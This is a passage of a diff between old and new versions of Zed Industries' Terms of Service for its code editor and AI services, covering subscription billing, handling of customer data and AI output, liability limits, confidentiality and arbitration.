If Customer activates a Subscription Service, then Customer authorizes Zed or its third-party payment processors to periodically charge, on a going-forward basis and until cancellation of the Subscription Service, all accrued sums on or before the payment due date. For information on the "Subscription Fee", please see Zed’s pricing page at [https://zed.dev/pricing](https://zed.dev/pricing). Customer’s account will be charged automatically on the Subscription Billing Date and thereafter on the renewal date of its Subscription Service for all applicable fees and taxes for the next Subscription Period. Customer must cancel its Subscription Service before it renews in order to avoid billing of the next periodic Subscription Fee to Customer’s account. Zed or its third-party payment processor will bill the periodic Subscription Fee to the payment method associated with Customer’s account or that Customer otherwise provides to Zed. Customer may cancel the Subscription Service from the account page at https://zed.dev/account or by contacting us at [billing-support@zed.dev](mailto:billing-support@zed.dev). **YOUR CANCELLATION MUST BE RECEIVED BEFORE THE RENEWAL DATE IN ORDER TO AVOID BEING CHARGED FOR THE NEXT SUBSCRIPTION PERIOD.** -- (a) file contents and associated metadata (e.g., filename, paths, size, timestamps); -- (b) source control history, comments and metadata (e.g., git history, commit messages); -- (c) configuration data (e.g., settings, keymaps); -- (d) anything typed, pasted and/or displayed on screen while using the Editor; -- (e) derivative works of the above generated by the Editor (e.g., format conversions, summaries, indexes, caches); -- (f) metadata, code and other derivative works of the above returned by language servers and other local tooling; and -- (g) metadata, code and other derivative works of the above returned by services integrated with the Zed Editor +### 3.5. Consumption Fees -(a-g collectively, "User Content"). 
+Customer’s subscription to the Service may permit Customer to submit prompts or other Customer Data for the purpose of generating Output, at no additional charge for a certain number of times each month. If Customer elects to submit a volume of prompts in excess of the quantity included in its Subscription Fee, then Customer authorizes Zed to charge, and Customer will be charged, a fee for each additional prompt at the rates set forth at [https://zed.dev/docs/ai/models](https://zed.dev/docs/ai/models). -#### 3.3.5. Handling of User Content +### 3.6. Delinquent Accounts -Zed will make use of or transfer User Content only as specified in this Agreement, or as necessary to comply with applicable law. +Zed may suspend or terminate access to the Service, including fee-based portions of the Service, for any account for which any amount is due but unpaid. In addition to the amount due for the Service, a delinquent account will be charged with fees or charges that are incidental to any chargeback or collection of any unpaid amount, including collection fees. If your payment method is no longer valid at the time a renewal Subscription Fee is due, then Zed reserves the right to delete your account and any information or Customer Data associated with your account without any liability to Customer. -#### 3.3.5.1. Zed Collaboration Services +## 4. Data -When using Zed Collaboration Services, User Content is transmitted from Your environment only if You collaborate with other Zed users by electing to share a project in the Editor. Once You share a project, Zed may transmit User Content consisting of file paths, file contents, and metadata regarding the code returned by language servers. Currently, Zed does not persist any User Content beyond the Your collaboration session. If You unshare a project or disconnect from the Solution, all information associated with such project will be deleted from Zed servers. 
In the future, Zed may save User Content regarding projects beyond the scope of a single collaboration session. We may share such User Content with those users You elected to grant access to. Zed's access to such User Content is limited to debugging and making improvements to the Solution. +### 4.1. Zed's Use of Customer Data -#### 3.3.5.2. Other Services +Customer hereby grants Zed a non-exclusive, worldwide, royalty-free, fully paid-up, non-sublicensable (except to service providers and Customer’s designees), non-transferable (except as set forth in Section 15.1) right to use, copy, store, disclose, transmit, transfer, display, modify, create derivative works from, collect, access, store, host, or otherwise process (“**Process**”) any materials that Customer inputs into or otherwise makes available to the Service (including prompts and other written content) (collectively, “**Customer Data**”) solely: (a) to perform its obligations set forth in the Terms, including its Support obligations as applicable; (b) to derive and generate Telemetry (see Section 4.4); and (c) as necessary to comply with applicable Laws. Except as required by applicable Laws, Zed will not provide Customer Data to any person or entity other than Customer’s designees (including pursuant to Section 7) or service providers. In the event that autocomplete suggestions are turned on, Customer understands and agrees that the Service will periodically send Customer Data in the background to an AI Provider for the purpose of generating autocomplete input suggestions in the Services. Autocomplete features can be turned off at any time, in which case Customer Data will not be sent. -The Zed Editor supports integration with API-based services maintained and not operated by Zed (the "Other Services"). By way of example, Other Services includes those made available by GitHub, Anthropic, OpenAI, and similar providers, or those You host or manage directly. 
You may configure the Zed Editor to interoperate, communicate with, and exchange data (including User Content) directly with the Other Services. Zed is not responsible or otherwise liable with respect to Your use of any Other Service, including but not limited to the exchange of data between the Other Service and the Zed Editor. The terms and conditions, including the applicable privacy policy, with respect to the Other Service are those made available by the applicable Other Service, not these Terms. +### 4.2. Customer's Ownership of Output -#### 3.3.5.3. Zed AI Services +The Service may generate specifically for, and make available to, Customer text and written content based on or in response to Customer Data input into the Service (collectively, “**Output**”), including through the use of technologies that incorporate or rely upon artificial intelligence, machine learning techniques, and other similar technology and features. As between the Parties, to the greatest extent permitted by applicable Laws, Customer owns all Output and Zed hereby irrevocably assigns to Customer all right, title, and interest in and to the Output that Zed may possess. **For the avoidance of doubt, Zed and its AI Providers will not retain or use Customer Data for the purpose of improving or training the Service or any AI Provider products, except to the extent Customer explicitly opts-in on Zed’s specific feature to allow training and/or such improvement (such as fine-tuning) and is solely for the benefit of Customer.** -The Zed Editor supports integration with API-based services maintained and operated by Zed (the "Zed AI Services"). You may elect to use Zed AI Services as the provider for various Zed Editor features (e.g., Agent Panel, Inline Assistant, Edit Predictions, and similar features). In connection with Your use of these features, the Zed Editor and Zed AI Services may make use of User Content to generate contextually relevant responses (the “Output”). 
Other than as specified in Section 3.3.5.4 of these Terms, Zed will not use User Content for training of its models, or disclose User Content. +### 4.3. Zed's Collection of Output Rating -Output is provided "as is" without any warranties or guarantees of functionality, security, or fitness for a particular purpose. While efforts are made to ensure the accuracy and reliability, Output may include errors, vulnerabilities, and defects. You are responsible for reviewing, testing, and validating Output before use in any production or critical environment. Zed assumes no liability for any damages, losses, or liability arising from the use, modification, reliance on, or deployment of Output. Any such use is at Your own risk. +The Service may enable Customer, at its option, to rate or otherwise provide feedback with respect to Output generated through the Service. If Customer opts in to provide feedback concerning Output using the features of the Software or Service (e.g., by clicking an Output rating button), then Customer agrees that Zed may Process that Output and associated Customer Data for the purpose of product development and improvement (“Output Rating”). For clarity, Customer’s decision to opt in to provide Output Rating is specific to the corresponding Output. Your decision to provide Output Rating with respect to one instance of Output does not give Zed the right to use any other Output for Output Rating purposes. -#### 3.3.5.4. Improvement Feedback +### 4.4. Telemetry -When using Zed AI Services to provide Edit Predictions in connection with certain open source software projects, You may elect to share requests, responses and feedback comments (collectively "Model Improvement Feedback") with Zed, and Zed may use the same to improve Zed Edit Predictions models. You may opt-out of sharing Model Improvement Feedback at any time. 
+Zed may collect, generate, and Process information, including technical logs, metrics, and data and learnings, related to the Software and Service (“**Telemetry**”) to improve and support the Services and for other lawful business purposes. Customer may configure the Software to opt out of the collection of certain Telemetry Processed locally by the Software itself, but Zed may still collect, generate, and Process Telemetry on Zed’s servers. Zed may not disclose Telemetry to any third-party other than Zed’s Representatives unless it is de-identified so that it does not identify Customer as the source thereof and is aggregated with data across other customers. **For avoidance of doubt, Telemetry expressly does not include Customer Data.** -For more information on Zed Edit Predictions please see: [https://zed.dev/docs/ai/ai-improvement](https://zed.dev/docs/ai/ai-improvement) +## 5. Customer Obligations -When using Zed AI Services in connection with the Agent Panel, You may elect to share with Zed requests, responses and feedback regarding the Agent Panel and related Output (the “Agent Improvement Feedback”) with Zed, and Zed may use the same to improve the Agent Panel and related Output. Zed will only collect Agent Improvement Feedback when You elect to share the same. +Customer is responsible for its Customer Data and will comply with applicable Laws when using the Service. Customer represents and warrants that it has obtained all rights, consents, and permissions necessary for Zed to Process Customer Data and exercise the rights granted to it in the Terms without violating or infringing Laws or third-party rights. Customer Data shall not contain: (a) any “protected health information” or “PHI” as defined under HIPAA (including 45 C.F.R. Parts 160 and 164); or (b) any payment card or cardholder data subject to PCI DSS (including primary account numbers, full track or chip data, CVV/CVC codes, PINs, or similar payment card security data). 
Customer is solely responsible for ensuring compliance with this restriction and shall be liable for, and shall indemnify Zed against, any claims, fines, or penalties arising from Customer’s breach of this Section. Zed disclaims any and all liability in connection with Customer Data. -For more information regarding the Agent Panel please see: [https://zed.dev/docs/ai/ai-improvement](https://zed.dev/docs/ai/ai-improvement) +## 6. Suspension of Service -#### 3.4. Privacy Policy +Zed may immediately suspend Customer’s access to any or all of the Service if: (a) Customer breaches Section 2.2 - 2.4 or Section 5; (b) any payments required under the Terms are overdue by 30 days or more; (c) changes to Laws or new Laws require that Zed suspend the Service or otherwise may impose additional liability on Zed in connection with its provision of the Service to Customer; or (d) Customer’s breach of the Terms risks harm to any of Zed’s other customers or the security, availability, or integrity of the Service or other services and entities. Where practicable, Zed will use reasonable efforts to provide Customer with prior notice of the suspension (email sufficing). If the issue that led to the suspension is resolved, Zed will restore Customer’s access to the Service. -You and Zed are bound by the terms and conditions contained in the Zed Privacy Policy which is incorporated by reference hereto. The Zed Privacy Policy is available at the following URL: [https://zed.dev/privacy-policy](https://zed.dev/privacy-policy). +## 7. Data Sharing and Third-Party Integrations -## 4. FEE BASED SERVICES, FEES AND PAYMENT TERMS +### 7.1. Collaboration Services -### 4.1. Fee Based Services +Certain features of the Service may allow Customer to share data between accounts on the Service, including accounts controlled by persons and entities not associated with Customer (“**Collaboration Features**”). 
If Customer elects to use Collaboration Features, Customer acknowledges and agrees that Zed will, and authorizes Zed to, make available Customer Data consisting of file paths, file contents, and metadata regarding the code returned by language servers to the third parties designated by Customer, and that Zed exercises no control over, and has no liability for, the acts or omissions of such third parties (including in connection with the Customer Data). Currently, with the exception of the Channel notes feature, Zed does not persist any shared Customer Data beyond the designated Collaboration Feature session. -The Zed AI Services is made available with additional usage benefits (the “Enhanced Use ”) as described in the table published at [zed.dev/pricing](https://zed.dev/pricing) (the “Pricing Table”), subject to the requirements and limitations set forth in the Pricing Table and these Terms. In order to make use of the Enhanced Use, Customer must access the Zed AI Services through a Zed registered account. +### 7.2. Third-Party Integrations -### 4.2. Fees +The Service may support integration with third-party platforms, add-ons, services, or products not provided by Zed (“**Third-Party Platforms**”). Use of any Third-Party Platforms integrated with or made available through the Service is subject to Customer’s agreement with the relevant provider and not these Terms. Zed does not control and has no liability for Third-Party Platforms, including their security, functionality, operation, availability, or interoperability with the Service. By enabling a Third-Party Platform to interact with the Service, Customer authorizes Zed to access and exchange Customer Data with such Third-Party Platform on Customer’s behalf. -Customer shall pay to Zed the applicable fees set forth in Pricing Table, together with any applicable taxes and shipping and handling (collectively, the “Fees”). Customer shall have no right of return, and all Fees shall be non-refundable. +## 8. 
Disclaimers; No Warranties by Zed -### 4.3. Payment Terms +THE SOFTWARE, SERVICE, OUTPUT, AND ALL OTHER ZED SERVICES ARE PROVIDED “AS IS” AND “AS AVAILABLE”. ZED, ON ITS OWN BEHALF AND ON BEHALF OF ITS SUPPLIERS AND LICENSORS, MAKES NO OTHER WARRANTIES, WHETHER EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE, INCLUDING WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE, OR NONINFRINGEMENT. ZED DOES NOT WARRANT THAT CUSTOMER’S USE OF THE SOFTWARE OR SERVICE WILL BE UNINTERRUPTED OR ERROR-FREE OR THAT IT WILL MAINTAIN CUSTOMER DATA WITHOUT LOSS. ZED IS NOT LIABLE FOR DELAYS, FAILURES, OR PROBLEMS INHERENT IN USE OF THE INTERNET AND ELECTRONIC COMMUNICATIONS OR OTHER SYSTEMS OUTSIDE OF ZED’S CONTROL. ZED IS NOT RESPONSIBLE FOR ANY DAMAGE THAT MAY RESULT FROM THE SOFTWARE OR SERVICE OR OUTPUT OR CUSTOMER’S DEALING WITH ANY OTHER SERVICE USER. Without limiting the foregoing, Customer acknowledges and agrees that: (a) the Service may produce inaccurate or erroneous Output; (b) Customer is responsible for independently evaluating the Output and any other information Customer receives from the Service; and (c) due to the nature of the Service and artificial intelligence technologies generally, Output may not be unique and other users of the Service may receive output from the Service that is similar or identical to the Output (and, notwithstanding anything to the contrary, such similar or identical output will not be understood to be Output). -All amounts payable to Zed under this Agreement shall be paid in United States dollars and paid Zed according to the method of payment, frequency and calculated as set forth in the Pricing Table. +THE LIMITATIONS, EXCLUSIONS AND DISCLAIMERS IN THIS SECTION 8 (DISCLAIMERS; NO WARRANTIES BY ZED) APPLY TO THE FULLEST EXTENT PERMITTED BY LAW. Zed does not disclaim any warranty or other right that Zed is prohibited from disclaiming under applicable law. -### 4.4. Taxes; Set-offs +## 9. 
Term, Termination, and Modification of the Service -Any and all payments made by Customer in accordance with this Agreement are exclusive of any taxes that might be assessed by any jurisdiction. Customer shall pay or reimburse Zed for all sales, use, property and similar taxes; all customs duties, import fees, stamp duties, license fees and similar charges; and all other mandatory payments to government agencies of whatever kind, except taxes imposed on the net or gross income of Zed. All amounts payable to Zed under this Agreement shall be without set-off and without deduction of any taxes, levies, imposts, charges, withholdings and/or duties of any nature which may be levied or imposed, including without limitation, value added tax, customs duty and withholding tax. +### 9.1. Term -## 5. TERM AND TERMINATION +These Terms are effective beginning when Customer accepts the Terms or first downloads, installs, accesses, or uses the Service, and ending when terminated as described in Section 9.2 (Termination). -### 5.1. Term +### 9.2. Termination -The term of this Agreement shall commence on the date You first download the Editor or use the Zed Service (the "Effective Date"), and unless terminated earlier according to this Section 3, will end pursuant to this Section 5 (the "Term"). +If Customer violates any provision of these Terms, then Customer is not authorized to access the Service and these Terms automatically terminate. In addition, Zed may, at its sole discretion, terminate these Terms or Customer’s account on the Service, or suspend or terminate Customer’s access to the Service, at any time for any reason or no reason, with or without notice, and without any liability to Customer arising from such termination. Customer may terminate its account and these Terms at any time by contacting Zed at [hi@zed.dev](mailto:hi@zed.dev). -### 5.2. Termination +### 9.3. 
Effect of Termination -This Agreement may be terminated: (a) by either party if the other has materially breached this Agreement; or (b) by Zed at any time and for any reason upon notice to Customer. You acknowledge that Zed is under no obligation to continue to operate the Zed Service or make the Editor available, and We may end any programs in connection with the same at any time. +Upon termination of these Terms: a) Customer’s license to access and use the Service will terminate and Customer must immediately cease all use of the Service; b) Customer will no longer be authorized to access its account or the Service; c) Customer must pay Zed any unpaid amount that was due prior to termination; and d) all payment obligations accrued prior to termination and Section(s) 2.4 (Restrictions), 3 (General Payment Terms) with the exception of 3.4 (Subscription Service), 4.2 (Customer’s Ownership of Output), 4.4 (Telemetry), 8 (Disclaimers; No Warranties by Zed), 9.3 (Effect of Termination), 10 (Ownership; Feedback), 11 (Limitations of Liability), 12 (Indemnity), 15 (Governing Law, Dispute Resolution and Arbitration); and 16 (General Terms), will survive. If Customer’s account has been terminated for a breach of these Terms, then Customer is prohibited from creating a new account on the Service. -### 5.3. Effect of Termination and Survival +### 9.4. Modification of the Service -Upon any expiration or termination of this Agreement, Customer shall (i) immediately cease use of the Zed Service, and (ii) return all Zed Confidential Information and other materials provided by Zed. The following provisions will survive termination of this Agreement: Sections 3.3 (Customer Data), Section 3.4 (Privacy Policy), Section 5.3 (Effect of Termination and Survival), Section 6 (Ownership), Section 7 (Indemnification), Section 9 (Limitation of Liability), Section 10 (Third Party Services), and Section 11 (Miscellaneous). 
+Zed reserves the right to modify or discontinue all or any portion of the Service at any time (including by limiting or discontinuing certain features of the Service), temporarily or permanently, without notice to Customer. Zed will have no liability to Customer for any change to the Service. -## 6. OWNERSHIP +## 10. Ownership; Feedback -Zed retains all right, title, and interest in and to the Zed Service, Editor, and any software, products, works or other intellectual property created, used, provided, or made available by Zed under or in connection with the Zed Service or Editor. Customer may from time to time provide suggestions, comments, or other feedback to Zed with respect to the Zed Service or Editor ("Feedback"). Customer shall, and hereby does, grant to Zed a nonexclusive, worldwide, perpetual, irrevocable, transferable, sublicensable, royalty-free, fully paid-up license to use and exploit the Feedback for any purpose. You retain all right, title and interest in and to the Customer Data, including all intellectual property rights therein. No intellectual property rights with respect to any software code you develop or modify with the Editor or Zed Service (collectively, the “Output”) are transferred or assigned to Zed hereunder. +Neither Party grants the other Party any rights or licenses not expressly set out in the Terms. Except as expressly provided in the Terms, as between the Parties, Customer retains all intellectual property rights and other rights in and to the Customer Data and Output. Except for the rights and licenses granted in the Terms, Zed and its licensors retain all intellectual property rights in and to the Service and Software. 
To the extent Customer provides Zed with feedback (including suggestions and comments for enhancements or new functionality) regarding the Service or Software, Output, or Zed’s products, services, or other technology (“**Feedback**”), Zed has the full and unrestricted right (but no obligation) to use or incorporate Feedback in any manner, including to improve and develop any of its products, services, technology, or other materials without attribution to Customer. -## 7. INDEMNIFICATION +## 11. Limitations of Liability -Customer will defend, indemnify, and hold Zed, its affiliates, suppliers and licensors harmless and each of their respective officers, directors, employees and representatives from and against any claims, damages, losses, liabilities, costs, and expenses (including reasonable attorneys' fees) arising out of or relating to any third party claim with respect to: (a) Customer Data; (b) breach of this Agreement or violation of applicable law by Customer; or (c) alleged infringement or misappropriation of third-party's intellectual property rights resulting from Customer Data. +### 11.1. -## 8. WARRANTY +TO THE FULLEST EXTENT PERMITTED BY LAW, IN NO EVENT WILL THE ZED ENTITIES BE LIABLE TO CUSTOMER FOR ANY INDIRECT, INCIDENTAL, SPECIAL, CONSEQUENTIAL, OR PUNITIVE DAMAGES (INCLUDING DAMAGES FOR LOSS OF PROFITS, GOODWILL, OR ANY OTHER INTANGIBLE LOSS) ARISING OUT OF OR RELATING TO YOUR ACCESS TO OR USE OF, OR YOUR INABILITY TO ACCESS OR USE, THE SERVICE OR ANY MATERIALS OR CONTENT ON THE SERVICE, WHETHER BASED ON WARRANTY, CONTRACT, TORT (INCLUDING NEGLIGENCE), STATUTE, OR ANY OTHER LEGAL THEORY, AND WHETHER OR NOT ANY ZED ENTITY HAS BEEN INFORMED OF THE POSSIBILITY OF DAMAGE. 
-Zed does not represent or warrant that the operation of the Zed Service or Editor (or any portion thereof) will be uninterrupted or error free, or that the Zed Service or Editor (or any portion thereof) will operate in combination with other hardware, software, systems or data not provided by Zed. CUSTOMER ACKNOWLEDGES THAT, ZED MAKES NO EXPRESS OR IMPLIED REPRESENTATIONS OR WARRANTIES OF ANY KIND WITH RESPECT TO THE SERVICE OR SOFTWARE, OR THEIR CONDITION. ZED HEREBY EXPRESSLY EXCLUDES, ANY AND ALL OTHER EXPRESS OR IMPLIED REPRESENTATIONS OR WARRANTIES, WHETHER UNDER COMMON LAW, STATUTE OR OTHERWISE, INCLUDING WITHOUT LIMITATION ANY AND ALL WARRANTIES AS TO MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, SATISFACTORY QUALITY OR NON-INFRINGEMENT OF THIRD-PARTY RIGHTS. +### 11.2. -## 9. LIMITATIONS OF LIABILITY +TO THE FULLEST EXTENT PERMITTED BY LAW, THE AGGREGATE LIABILITY OF THE ZED ENTITIES TO CUSTOMER FOR ALL CLAIMS ARISING OUT OF OR RELATING TO THE USE OF OR ANY INABILITY TO USE ANY PORTION OF THE SERVICE, OR OTHERWISE ARISING UNDER THESE TERMS, WHETHER IN CONTRACT, TORT, OR OTHERWISE, IS LIMITED TO THE GREATER OF:  THE AMOUNT CUSTOMER HAS PAID TO ZED FOR ACCESS TO AND USE OF THE SERVICE IN THE 12 MONTHS PRIOR TO THE EVENT OR CIRCUMSTANCE GIVING RISE TO THE CLAIM OR US$100. -IN NO EVENT SHALL ZED BE LIABLE FOR ANY LOST DATA, LOST PROFITS, BUSINESS INTERRUPTION, REPLACEMENT SERVICE OR OTHER SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR INDIRECT DAMAGES, HOWEVER CAUSED AND REGARDLESS OF THEORY OF LIABILITY. ZED'S LIABILITY FOR ALL CLAIMS ARISING UNDER THIS AGREEMENT, WHETHER IN CONTRACT, TORT OR OTHERWISE, SHALL NOT EXCEED THE GREATER OF: THE FEES PAID TO ZED BY CUSTOMER DURING THE TWELVE (12) MONTH PERIOD PRECEDING THE DATE OF THE CLAIM, OR ONE THOUSAND US DOLLARS ($1,000). +### 11.3. -## 10. 
Third Party Services +EACH PROVISION OF THESE TERMS THAT PROVIDES FOR A LIMITATION OF LIABILITY, DISCLAIMER OF WARRANTIES, OR EXCLUSION OF DAMAGES IS INTENDED TO AND DOES ALLOCATE THE RISKS BETWEEN THE PARTIES UNDER THESE TERMS. THIS ALLOCATION IS AN ESSENTIAL ELEMENT OF THE BASIS OF THE BARGAIN BETWEEN THE PARTIES. EACH OF THESE PROVISIONS IS SEVERABLE AND INDEPENDENT OF ALL OTHER PROVISIONS OF THESE TERMS. THE LIMITATIONS IN THIS SECTION 11 (LIMITATION OF LIABILITY) WILL APPLY EVEN IF ANY LIMITED REMEDY FAILS OF ITS ESSENTIAL PURPOSE. -Zed may make certain third party services available to You within the Editor or the Zed Service (each a "Third Party Service"). You acknowledge and agree that (a) use of each Third Party Service is subject to the corresponding terms and conditions available at the following URL: [https://zed.dev/third-party-terms](https://zed.dev/third-party-terms) and/or presented in connection with Your use of such Third Party Service; (b) the terms and conditions of this Agreement do not apply with respect to Your use of any Third Party Service; and (c) Zed is not liable in any way regarding Your use of any Third Party Service. +## 12. Indemnity -## 11. 
MISCELLANEOUS +To the fullest extent permitted by law, Customer is responsible for its use of the Service, and Customer will defend and indemnify Zed, its affiliates, and their respective shareholders, directors, managers, members, officers, employees, consultants, and agents (together, the "Zed Entities") from and against every claim brought by a third party, and any related liability, damage, loss, and expense, including attorneys' fees and costs, arising out of or connected with: (1) Customer’s unauthorized use of, or misuse of, the Service; (2) the Customer Data; (3) Customer’s use of Output; (4) Customer’s violation or alleged violation of any portion of these Terms, any representation, warranty, or agreement referenced in these Terms, or any applicable law or regulation; (5) Customer’s violation or alleged violation of any third-party right, including any intellectual property right or publicity, confidentiality, other property, or privacy right; or (6) any dispute or issue between Customer and any third party. Zed reserves the right, at Zed’s own expense, to assume the exclusive defense and control of any matter otherwise subject to indemnification by Customer (without limiting Customer’s indemnification obligations with respect to that matter), and in that case, Customer agrees to cooperate with our defense of those claims. -### 11.1. Export Control +## 13. Confidentiality -You hereby certify that You will comply with all current US Export Control laws. You agree to defend, indemnify and hold Zed harmless from any liability for Your violation of U.S. Export Control laws. +### 13.1. Definition -### 11.2. 
Compliance with Laws +“**Confidential Information**” means information disclosed to the receiving Party (“**Recipient**”) under the Terms that is designated by the disclosing Party (“**Discloser**”) as proprietary or confidential or that should be reasonably understood to be proprietary or confidential due to its nature and the circumstances of its disclosure. Zed’s Confidential Information includes the terms and conditions of the Terms and the Service (including any technical or performance information about the Service). -You shall comply with all applicable laws and regulations in its use of the Solution, including without limitation the unlawful gathering or collecting, or assisting in the gathering or collecting of information in violation of any privacy laws or regulations. You shall, at its own expense, defend, indemnify and hold harmless Zed from and against any and all claims, losses, liabilities, damages, judgments, government or federal sanctions, costs and expenses (including attorneys' fees) incurred by Zed arising from any claim or assertion by any third party of violation of privacy laws or regulations by You or any of its agents, officers, directors or employees. +### 13.2. Obligations -### 11.3. Assignment +As Recipient, each Party will: (a) hold Confidential Information in confidence and not disclose it to third parties except as permitted in the Terms, including Section 4.1; and (b) only use Confidential Information to fulfill its obligations and exercise its rights under the Terms. 
Recipient may disclose Confidential Information to its employees, agents, contractors, and other representatives having a legitimate need to know (including, for Zed, the subcontractors referenced in Section 16.5) (“**Representatives**”), provided Recipient remains responsible for its respective Representatives’ compliance with this Section 13 and such Representatives are bound by written agreements (or, in the case of professional advisers like attorneys and accountants, ethical duties) imposing confidentiality and non-use obligations no less protective than this Section 13. -Neither party may transfer and assign its rights and obligations under this Agreement without the prior written consent of the other party. Notwithstanding the foregoing, Zed may transfer and assign its rights under this Agreement without consent from the other party in connection with a change in control, acquisition or sale of all or substantially all of its assets. +### 13.3. Exclusions -### 11.4. Force Majeure +These confidentiality obligations do not apply to information that Recipient can document: (a) is or becomes public knowledge through no fault of Recipient or its Representatives; (b) it rightfully knew or possessed prior to receipt under the Terms; (c) it rightfully received from a third party without breach of confidentiality obligations; or (d) it independently developed without using Confidential Information. -Neither party shall be responsible for failure or delay in performance by events out of their reasonable control, including but not limited to, acts of God, Internet outage, terrorism, war, fires, earthquakes and other disasters (each a "Force Majeure"). Notwithstanding the foregoing: if a Force Majeure continues for more than thirty (30) days, either party may to terminate this agreement by written notice to the other party. +### 13.4. Remedies -### 11.5. 
Notice +Unauthorized use or disclosure of Confidential Information may cause substantial harm for which damages alone are an insufficient remedy. Discloser may seek appropriate equitable relief, in addition to other available remedies, for breach or threatened breach of this Section 13, without the  necessity of posting a bond or proving actual damages. -All notices between the parties shall be in writing and shall be deemed to have been given if personally delivered or sent by registered or certified mail (return receipt), or by recognized courier service. +### 13.5. Required Disclosures -### 11.6. No Agency +Nothing in the Terms prohibits Recipient from making disclosures, including of Customer Data and other Confidential Information, if required by Laws, subpoena, or court order, provided (if permitted by Laws) it notifies Discloser in advance and cooperates in any effort to obtain confidential treatment. -Both parties agree that no agency, partnership, joint venture, or employment is created as a result of this Agreement. You do not have any authority of any kind to bind Zed. +## 14. Publicity -### 11.7. Governing Law +Neither Party may publicly announce that the Parties have entered into the Terms, except with the other Party’s prior consent or as required by Laws. However, Zed may use the name, brand, or logo of Customer (or Customer’s parent company) for the purpose of identifying Customer as a licensee or customer on Zed’s website or in other promotional materials. Zed will cease further use at Customer’s written request. -This Agreement shall be governed exclusively by, and construed exclusively in accordance with, the laws of the United States and the State of California, without regard to its conflict of laws provisions. The federal courts of the United States in the Northern District of California and the state courts of the State of California shall have exclusive jurisdiction to adjudicate any dispute arising out of or relating to this Agreement. 
Each party hereby consents to the jurisdiction of such courts and waives any right it may otherwise have to challenge the appropriateness of such forums, whether on the basis of the doctrine of forum non conveniens or otherwise. The United Nations Convention on Contracts for the International Sale of Goods shall not apply to this Agreement or any Purchase Order issued under this Agreement. +## 15. Governing Law, Dispute Resolution and Arbitration -### 11.8. Updated Agreement +### 15.1. Governing Law, Jurisdiction and Venue -Zed reserves the right to update this Agreement at any time. The terms and conditions of the updated version of the Agreement shall apply to the Zed Service and Editor downloaded, or accessed following the date of publication of the updated version. If You do not agree with any terms of the updated Agreement, You may not use or access the Zed Service or Editor in any manner. Zed may from time-to-time provide release notes applicable to the Editor or Zed Service, and such release notes may contain additional use restrictions or terms applicable to Customer Data. Your use of the Editor or Zed Service after the applicable release notes are made available shall be subject to the additional use restrictions or terms applicable to Customer Data. +The Terms are governed by the laws of the State of Delaware and the United States without regard to conflicts of laws provisions that would result in the application of the laws of another jurisdiction and without regard to the United Nations Convention on the International Sale of Goods. The parties further agree that except as stated below in the Arbitration provision, and for any claims under Section 15.2 (b), each party irrevocably consents to the exclusive jurisdiction and venue of the state and federal courts located in New Castle County, Delaware, for any action arising out of or relating to these Terms, and waive any objection based on venue or forum non conveniens. 
ANY CAUSE OF ACTION OR CLAIM CUSTOMER MAY HAVE ARISING OUT OF OR RELATING TO THESE TERMS MUST BE COMMENCED WITHIN ONE (1) YEAR AFTER THE CAUSE OF ACTION OR CLAIM ACCRUES, OTHERWISE, SUCH CAUSE OF ACTION OR CLAIM IS PERMANENTLY BARRED. -### 11.9. Entire Agreement +### 15.2. Dispute Resolution and Arbitration -This Agreement is the complete and exclusive statement of the mutual understanding of the parties and supersedes and cancels all previous written and oral agreements, communications, and other understandings relating to the subject matter of this Agreement, and all waivers and modifications must be in a writing signed by both parties, except as otherwise provided herein. Any term or provision of this Agreement held to be illegal or unenforceable shall be, to the fullest extent possible, interpreted so as to be construed as valid, but in any event the validity or enforceability of the remainder hereof shall not be affected. +ANY CONTROVERSY OR CLAIM ARISING OUT OF OR RELATING TO THESE TERMS, OR THE BREACH THEREOF, SHALL BE SETTLED BY ARBITRATION AND JUDGMENT ON THE AWARD RENDERED BY THE ARBITRATOR MAY BE ENTERED IN ANY COURT HAVING JURISDICTION THEREOF. IF THERE IS A DISPUTE ABOUT WHETHER THIS ARBITRATION AGREEMENT CAN BE ENFORCED OR APPLIES TO THE DISPUTE, CUSTOMER AND ZED AGREE THAT THE ARBITRATOR WILL DECIDE THAT ISSUE. -**DATE: May 6, 2025** +**a. 
Opt-Out.** If Customer does not wish to resolve disputes by binding arbitration, Customer may opt out of the provisions of this Section 17.2 (Dispute Resolution and Arbitration) within 30 days after the date that Customer agrees to these Terms by sending an email to [arbitration-opt-out@zed.dev](mailto:arbitration-opt-out@zed.dev) or a letter to Zed Industries, Inc., Attention: Legal Department – Arbitration Opt-Out, 2590 Welton Street, Suite 200, PMB 1916, Denver, CO 80205 that specifies: Customer’s full legal name, the email address associated with Customer’s account on the Service, and a statement that Customer wishes to opt out of arbitration (“**Opt-Out Notice**”). Once Zed receives Customer’s Opt-Out Notice, this Section 15.2 (Dispute Resolution and Arbitration) will be void and any action arising out of these Terms will be resolved as set forth in Section 15.1 (Governing Law). The remaining provisions of these Terms will not be affected by Customer’s Opt-Out Notice. + +**b. Pre-Arbitration Dispute Resolution and Notification.** Prior to initiating an arbitration, Customer and Zed each agree to notify the other party of the dispute and attempt to negotiate an informal resolution to it first. Zed will contact Customer at the email address Customer has provided to Zed; Customer can contact Zed by email at [legal@zed.dev](mailto:legal@zed.dev). If after a good faith effort to negotiate, one party feels the dispute has not and cannot be resolved informally, the party intending to pursue arbitration agrees to notify the other party via email prior to initiating the arbitration. + +**c. 
Exceptions to Arbitration.** Customer and Zed each agree that the following claims are exceptions to arbitration and will be brought in a judicial proceeding in a court of competent jurisdiction: (i) Any claim related to actual or threatened infringement, misappropriation or violation of a party’s copyrights, trademarks, trade secrets, patents, or other intellectual property rights; or (ii) Any claim seeking emergency injunctive relief based on exigent circumstances (e.g., imminent danger or commission of a crime, hacking, cyber-attack). + +**d. Arbitration Rules.** (1) If Customer is domiciled in the U.S. - Any controversy or claim arising out of or relating to this contract, or the breach thereof, shall be settled by arbitration administered by the American Arbitration Association in accordance with its Commercial Arbitration Rules, and judgment on the award rendered by the arbitrator may be entered in any court having jurisdiction thereof. (2) If Customer is domiciled internationally outside the U.S. - Any controversy or claim arising out of or relating to this contract, or the breach thereof, shall be determined by arbitration administered by the International Centre for Dispute Resolution in accordance with its International Arbitration Rules. + +**e. Modification to AAA Rules - Arbitration Hearing/Location.** Customer agrees that any required arbitration hearing will be conducted in the English language by one (1) mutually agreed upon arbitrator, (a) in city/county and state of 